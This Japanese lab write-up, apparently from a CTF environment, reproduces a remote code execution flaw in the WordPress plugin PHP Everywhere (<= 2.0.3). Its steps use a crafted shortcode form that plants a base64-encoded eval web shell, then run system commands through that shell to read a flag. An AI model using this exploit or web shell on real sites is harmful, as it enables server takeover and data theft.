製品概要#
WordPress は、個人のブログシステムであり、徐々にコンテンツ管理システムソフトウェアに進化してきました。PHP 言語と MySQL データベースを使用して開発されており、ユーザーは PHP と MySQL データベースをサポートするサーバー上で独自のブログを使用することができます。
脆弱性の概要#
任意のサブスクライバーは、この脆弱性を利用して、「ショートコード」パラメータを PHP Everywhere に設定したリクエストを送信し、サイト上で任意の PHP コードを実行することができます。
影響範囲#
<= 2.0.3
影響を受けるプラグイン:PHP Everywhere
悪用手順#
バックエンドのアドレスにアクセスします:
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin
アカウント:test/test
ダッシュボードの下にあるコンテンツを削除し、ブラウザの F12 を押してノードを追加し、次の内容を入力します:
<form
action="http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
method="post"
>
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">
[php_everywhere] <?php file_put_contents("/var/www/html/111.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]</textarea>
<input type="submit" value="実行" />
</form>
その後、実行してください(「実行」をクリック)。次のリンクにアクセスします:
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php
ページが 200 を返します。
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=phpinfo();
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=system(%27tac%20/f*%27);
修正の提案#
- バージョンのアップグレード